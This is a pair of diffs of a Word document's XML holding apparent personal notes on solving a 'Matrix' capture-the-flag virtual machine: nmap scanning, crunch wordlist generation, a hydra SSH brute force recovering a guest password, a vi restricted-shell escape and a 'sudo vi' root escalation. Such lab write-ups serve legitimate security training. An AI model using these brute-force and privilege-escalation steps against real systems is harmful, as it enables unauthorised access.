--- a/VM/7.Matrix_machine.docx
+++ b/VM/7.Matrix_machine.docx
@@ -43,7 +43,42 @@
         <w:t>Paul Krishnamurthy 2016</w:t>
       </w:r>
     </w:p>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>192.168.1.174</w:t>
+      </w:r>
+      <w:r>
+        <w:t>:31337/cyphertext.txt</w:t>
+      </w:r>
+    </w:p>
     <w:p>
       <w:hyperlink r:id="rId4" w:history="1">
         <w:r>
@@ -67,114 +102,221 @@
         <w:rPr>
           <w:color w:val="FF0000"/>
         </w:rPr>
-        <w:t xml:space="preserve">  (</w:t>
-      </w:r>
-      <w:r>
+        <w:t xml:space="preserve">  (You can enter into matrix as guest, with password k1ll0rXX</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:color w:val="FF0000"/>
         </w:rPr>
-        <w:t>You can enter into matrix as guest, with password k1ll0rXX</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:color w:val="FF0000"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t>Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">crunch 8 8 1234567890abcdefghijklmnopqrstuvwxyz -t k1ll0r@@ -o mywordlist1  </w:t>
+      </w:r>
+      <w:r>
+        <w:t>(create your own wordlist for password)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  or cup git repo or mp64 </w:t>
+      </w:r>
+      <w:r>
+        <w:t>k1ll0r</w:t>
+      </w:r>
+      <w:r>
+        <w:t>?a?a &gt;&gt; wordlist</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t>cat /usr/shar/crunch/charset.lst</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (for type of crunch)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">crunch 3 3 -f </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t>/usr/share/crunch/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t>charset.lst mixalpha-numeric-all-space-sv -o mywordlist</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">hydra -l guest -P /root/mywordlist 192.168.1.174  ssh   </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">password : </w:t>
+      </w:r>
+      <w:r>
+        <w:t>k1ll0r</w:t>
+      </w:r>
+      <w:r>
+        <w:t>7n</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:color w:val="FF0000"/>
         </w:rPr>
-        <w:t>Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.</w:t>
-      </w:r>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:color w:val="FF0000"/>
         </w:rPr>
+        <w:t>another user (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>trinity</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
         <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">crunch 8 8 1234567890abcdefghijklmnopqrstuvwxyz -t k1ll0r@@ -o mywordlist1  </w:t>
-      </w:r>
-      <w:r>
-        <w:t>(create your own wordlist for password)</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  or cup git repo or mp64 </w:t>
+        <w:t>shell is restricted except vi</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Echo $SHELL   /bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Echo $PATH     /bin</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Set shell=bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+      </w:pPr>
+      <w:r>
+        <w:t>:!/bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Export SHELL=/bin/bash:$SHELL</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Export path=/usr/bin:/bin:$PATH</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>export (to find current the path and shell)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>put the :!/bin/bash in vi editor then it will remove restriction</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>export=PATH=/usr/bin:/bin</w:t>
+      </w:r>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>sudo vi -c ':!/bin/bash' /dev/null</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">root password  </w:t>
       </w:r>
       <w:r>
         <w:t>k1ll0r</w:t>
       </w:r>
       <w:r>
-        <w:t>?a?a &gt;&gt; wordlist</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">hydra -l guest -P /root/mywordlist 192.168.1.174  ssh   </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">password : </w:t>
-      </w:r>
-      <w:r>
-        <w:t>k1ll0r</w:t>
-      </w:r>
-      <w:r>
         <w:t>7n</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>another user (</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>trinity</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>shell is restricted except vi</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>export (to find current the path and shell)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>put the :!/bin/bash in vi editor then it will remove restriction</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>export=PATH=/usr/bin:/bin</w:t>
-      </w:r>
-      <w:r>
-        <w:t>/</w:t>
       </w:r>
     </w:p>
     <w:p/>

--- a/VM/7.Matrix_machine.docx
+++ b/VM/7.Matrix_machine.docx
@@ -1,11 +1,39 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14">
   <w:body>
     <w:p>
-      <w:r>
-        <w:t>nmap -sV -sC 192.168.1.174 -vv</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sV</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sC</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 192.168.1.174 -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -89,7 +117,15 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve">  ( decode cypher text)</w:t>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>( decode</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> cypher text)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -119,14 +155,27 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t xml:space="preserve">crunch 8 8 1234567890abcdefghijklmnopqrstuvwxyz -t k1ll0r@@ -o mywordlist1  </w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>crunch</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 8 8 1234567890abcdefghijklmnopqrstuvwxyz -t k1ll0r@@ -o mywordlist1  </w:t>
       </w:r>
       <w:r>
         <w:t>(create your own wordlist for password)</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">  or cup git repo or mp64 </w:t>
+        <w:t xml:space="preserve">  or cup </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>git</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> repo or mp64 </w:t>
       </w:r>
       <w:r>
         <w:t>k1ll0r</w:t>
@@ -141,12 +190,56 @@
           <w:color w:val="00B050"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="00B050"/>
-        </w:rPr>
-        <w:t>cat /usr/shar/crunch/charset.lst</w:t>
-      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t>cat</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t>shar</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t>/crunch/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t>charset.lst</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:color w:val="00B050"/>
@@ -160,34 +253,126 @@
           <w:color w:val="00B050"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="00B050"/>
-        </w:rPr>
-        <w:t xml:space="preserve">crunch 3 3 -f </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="00B050"/>
-        </w:rPr>
-        <w:t>/usr/share/crunch/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="00B050"/>
-        </w:rPr>
-        <w:t>charset.lst mixalpha-numeric-all-space-sv -o mywordlist</w:t>
-      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t>crunch</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 3 3 -f </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t>/share/crunch/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t>charset.lst</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t>mixalpha</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t>-numeric-all-space-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t>sv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -o </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t>mywordlist</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p/>
     <w:p>
-      <w:r>
-        <w:t xml:space="preserve">hydra -l guest -P /root/mywordlist 192.168.1.174  ssh   </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">password : </w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>hydra</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -l guest -P /root/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>mywordlist</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 192.168.1.174  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ssh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">   </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>password :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t>k1ll0r</w:t>
@@ -202,16 +387,24 @@
           <w:color w:val="FF0000"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:color w:val="FF0000"/>
         </w:rPr>
-        <w:t>another user (</w:t>
-      </w:r>
+        <w:t>another</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:color w:val="FF0000"/>
         </w:rPr>
+        <w:t xml:space="preserve"> user (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
         <w:t>trinity</w:t>
       </w:r>
       <w:r>
@@ -222,8 +415,52 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t>shell is restricted except vi</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>shell</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> is restricted except </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vi</w:t>
+      </w:r>
+      <w:r>
+        <w:t>editor</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> esc :!/bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>bassh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">  (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>restricyon</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> will remove)</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>go</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> to vi </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -259,8 +496,13 @@
       <w:pPr>
         <w:pStyle w:val="HTMLPreformatted"/>
       </w:pPr>
-      <w:r>
-        <w:t>:!/bin/bash</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>:!/</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>bin/bash</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -273,7 +515,15 @@
         <w:pStyle w:val="HTMLPreformatted"/>
       </w:pPr>
       <w:r>
-        <w:t>Export SHELL=/bin/bash:$SHELL</w:t>
+        <w:t>Export SHELL=/bin/bash</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>:$</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>SHELL</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -281,36 +531,87 @@
         <w:pStyle w:val="HTMLPreformatted"/>
       </w:pPr>
       <w:r>
-        <w:t>Export path=/usr/bin:/bin:$PATH</w:t>
+        <w:t>Export path=/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/bin</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>:/</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>bin:$PATH</w:t>
       </w:r>
     </w:p>
     <w:p/>
     <w:p>
-      <w:r>
-        <w:t>export (to find current the path and shell)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>put the :!/bin/bash in vi editor then it will remove restriction</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>export=PATH=/usr/bin:/bin</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>export</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> (to find current the path and shell)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>put</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> the :!/bin/bash in vi editor then it will remove restriction</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>export=</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>PATH=/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/bin:/bin</w:t>
       </w:r>
       <w:r>
         <w:t>/</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t>sudo vi -c ':!/bin/bash' /dev/null</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">root password  </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> vi -c ':!/bin/bash' /dev/null</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>root</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> password  </w:t>
       </w:r>
       <w:r>
         <w:t>k1ll0r</w:t>
@@ -331,7 +632,7 @@
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh">
+<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 w15">
   <w:docDefaults>
     <w:rPrDefault>
       <w:rPr>
@@ -347,7 +648,7 @@
       </w:pPr>
     </w:pPrDefault>
   </w:docDefaults>
-  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="376">
+  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="371">
     <w:lsdException w:name="Normal" w:uiPriority="0" w:qFormat="1"/>
     <w:lsdException w:name="heading 1" w:uiPriority="9" w:qFormat="1"/>
     <w:lsdException w:name="heading 2" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
@@ -719,11 +1020,6 @@
     <w:lsdException w:name="List Table 5 Dark Accent 6" w:uiPriority="50"/>
     <w:lsdException w:name="List Table 6 Colorful Accent 6" w:uiPriority="51"/>
